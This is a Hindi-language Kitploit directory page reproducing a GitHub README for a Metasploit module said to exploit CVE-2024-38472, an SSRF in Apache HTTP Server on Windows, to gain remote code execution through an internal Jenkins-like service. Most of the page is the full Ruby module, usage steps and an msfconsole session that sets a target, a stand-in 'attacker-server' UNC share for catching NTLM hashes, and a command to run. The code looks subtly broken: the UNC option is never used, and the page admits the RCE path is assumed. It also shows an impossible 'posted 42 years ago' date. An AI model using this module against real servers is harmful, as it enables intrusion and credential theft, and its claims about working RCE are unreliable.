Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-38472 — Metasploit module जो Windows पर Apache HTTP Server में CVE-2024-38472 SSRF का शोषण करता है, आंतरिक सेवा इंटरैक्शन के माध्यम से Remote Code Execution प्राप्त करने के लिए। | Kitploit
उपकरण/GitHubGitHub/abdurahmon3236/cve-2024-38472
भेद्यता परीक्षण फ्रेमवर्कशोषण फ्रेमवर्कभेद्यता विश्लेषणपार्श्व आंदोलनवेब एप्लिकेशन शोषणपोस्ट-शोषणकमांड एंड कंट्रोलरेड टीमिंगपेलोड डेवलपमेंट
GitHubabdurahmon3236/cve-2024-38472

CVE-2024-38472

Metasploit module जो Windows पर Apache HTTP Server में CVE-2024-38472 SSRF का शोषण करता है, आंतरिक सेवा इंटरैक्शन के माध्यम से Remote Code Execution प्राप्त करने के लिए।

42 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

विंडोज पर Apache HTTP Server में SSRF भेद्यता (CVE-2024-38472) के लिए एक रिमोट कोड निष्पादन (RCE) Metasploit मॉड्यूल बनाना चुनौतीपूर्ण है क्योंकि SSRF स्वयं सीधे RCE का परिणाम नहीं देता है। हालाँकि, SSRF अक्सर RCE प्राप्त करने की दिशा में एक कदम हो सकता है, खासकर यदि आप इसका उपयोग आंतरिक सेवाओं के साथ बातचीत करने या किसी द्वितीयक भेद्यता को ट्रिगर करने के लिए कर सकते हैं।

SSRF के माध्यम से RCE के लिए रणनीति

SSRF के माध्यम से RCE प्राप्त करने के लिए, हमें आम तौर पर आवश्यकता होगी:

  1. एक आंतरिक सेवा जो किसी विशिष्ट हमले के प्रति संवेदनशील हो जिसका शोषण SSRF के माध्यम से किया जा सके।
  2. एक गलत कॉन्फ़िगरेशन या अतिरिक्त भेद्यता जो मनमाने कोड निष्पादन की अनुमति देती है।

इस उदाहरण के लिए, मान लें कि हम आंतरिक रूप से एक द्वितीयक सेवा को ट्रिगर कर सकते हैं जो HTTP अनुरोधों को स्वीकार करती है और मनमाना कोड निष्पादित करने के लिए धोखा दिया जा सकता है (जैसे Jenkins सर्वर या कोई अन्य सेवा जिसमें खुला API हो)।

उदाहरण Metasploit मॉड्यूल

हम एक Metasploit मॉड्यूल तैयार करेंगे जो SSRF का शोषण करके आंतरिक सेवा के साथ बातचीत करके RCE प्राप्त करने का प्रयास करता है। इस मामले में, हम एक आंतरिक Jenkins सर्वर का अनुकरण करेंगे जिसमें एक खुला स्क्रिप्ट कंसोल है जिसका हम RCE के लिए दुरुपयोग कर सकते हैं।

निम्नलिखित कोड को अपने Metasploit Framework इंस्टॉलेशन की modules/exploits/multi/http निर्देशिका में apache_unc_ssrf_rce.rb के रूप में सहेजें।

root@kitploit:~
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apache HTTP Server Windows UNC SSRF to RCE',
      'Description'    => %q{
        This module exploits a Server-Side Request Forgery (SSRF) vulnerability in Apache HTTP Server on Windows,
        which can potentially be leveraged to achieve Remote Code Execution (RCE) by interacting with internal
        services like Jenkins.
      },
      'Author'         =>
        [
          'Your Name'  # Your name or handle
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2024-38472'],
          ['URL', 'https://example.com/advisory'] # Replace with an advisory link if available
        ],
      'DisclosureDate' => 'Aug 03 2024',
      'Platform'       => ['win'],
      'Arch'           => [ARCH_CMD],
      'Targets'        => [
        ['Windows', { 'Arch' => ARCH_CMD, 'Platform' => 'win' }]
      ],
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        Opt::RHOSTS,
        Opt::RPORT(80),
        OptString.new('TARGETURI', [ true, "The base path to the vulnerable application", '/']),
        OptString.new('UNC_SERVER', [ true, "UNC path of the malicious server to receive NTLM hashes", '\\\\attacker-server\\share']),
        OptString.new('INTERNAL_SERVICE', [ true, "Internal service URL to exploit for RCE", 'http://internal-service/script']),
        OptString.new('CMD', [ true, "Command to execute", 'calc.exe'])
      ])
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path),
    })

    if res && res.headers['Server'] && res.headers['Server'].include?('Apache')
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    ssrf_payload = {
      'method'  => 'GET',
      'uri'     => normalize_uri(target_uri.path),
      'version' => '1.1',
      'headers' => {
        'Host' => datastore['RHOSTS'],
        'Content-Type' => 'application/x-www-form-urlencoded'
      },
      'data'    => "url=#{datastore['INTERNAL_SERVICE']}?script=#{Rex::Text.uri_encode(datastore['CMD'])}"
    }

    begin
      print_status("Sending SSRF request to #{datastore['RHOSTS']}:#{datastore['RPORT']}#{target_uri.path}")
      res = send_request_cgi(ssrf_payload)

      if res && res.code == 200
        print_good("Successfully triggered the internal service")
      else
        print_error("Failed to trigger the internal service: #{res.inspect}")
      end
    rescue ::Rex::ConnectionError => e
      print_error("Connection failed: #{e.message}")
    rescue ::Interrupt
      print_status("User interrupted the module execution")
    rescue ::Exception => e
      print_error("An unexpected error occurred: #{e.message}")
    end
  end
end

उपयोग निर्देश

  1. मॉड्यूल सहेजें: मॉड्यूल को अपने Metasploit Framework इंस्टॉलेशन की modules/exploits/multi/http निर्देशिका में apache_unc_ssrf_rce.rb के रूप में सहेजें।

    root@kitploit:~
    /path/to/metasploit-framework/modules/exploits/multi/http/apache_unc_ssrf_rce.rb
    
  2. Metasploit लोड करें: एक टर्मिनल खोलकर और निम्नलिखित चलाकर Metasploit Framework प्रारंभ करें:

    root@kitploit:~
    msfconsole
    
  3. नए मॉड्यूल का उपयोग करें: Metasploit कंसोल में, निम्नलिखित कमांड का उपयोग करके नए एक्सप्लॉइट मॉड्यूल को लोड करें:

    root@kitploit:~
    use exploit/multi/http/apache_unc_ssrf_rce
    
  4. कॉन्फ़िगर करें और चलाएं: आवश्यक विकल्प सेट करें, जैसे RHOSTS, RPORT, TARGETURI, UNC_SERVER, INTERNAL_SERVICE, और CMD। फिर मॉड्यूल चलाएं।

महत्वपूर्ण विचार

  • किसी भी सिस्टम का परीक्षण या शोषण करने से पहले सुनिश्चित करें कि आपके पास उचित अनुमतियाँ हैं।
  • यह मॉड्यूल शैक्षिक और परीक्षण उद्देश्यों के लिए डिज़ाइन किया गया है। किसी भी उत्पादन प्रणाली पर उपयोग करने से पहले हमेशा एक सुरक्षित और नियंत्रित वातावरण में परीक्षण करें।

यह उन्नत Metasploit मॉड्यूल विंडोज पर कमजोर Apache HTTP सर्वर को एक तैयार अनुरोध भेजता है, जो SSRF भेद्यता को ट्रिगर करने और आंतरिक सेवा के साथ बातचीत करके RCE प्राप्त करने का प्रयास करता है। भेद्यता और लक्ष्य वातावरण की विशिष्ट प्रकृति के आधार पर पेलोड और मॉड्यूल को आवश्यकतानुसार समायोजित करें।

टूल डाउनलोड करें
root@kitploit:~
msf6 > use exploit/multi/http/apache_unc_ssrf_rce
msf6 exploit(multi/http/apache_unc_ssrf_rce) > set RHOSTS target_ip
RHOSTS => target_ip
msf6 exploit(multi/http/apache_unc_ssrf_rce) > set RPORT 80
RPORT => 80
msf6 exploit(multi/http/apache_unc_ssrf_rce) > set TARGETURI /
TARGETURI => /
msf6 exploit(multi/http/apache_unc_ssrf_rce) > set UNC_SERVER \\\\attacker-server\\share
UNC_SERVER => \\attacker-server\share
msf6 exploit(multi/http/apache_unc_ssrf_rce) > set INTERNAL_SERVICE http://internal-service/script
INTERNAL_SERVICE => http://internal-service/script
msf6 exploit(multi/http/apache_unc_ssrf_rce) > set CMD calc.exe
CMD => calc.exe
msf6 exploit(multi/http/apache_unc_ssrf_rce) > run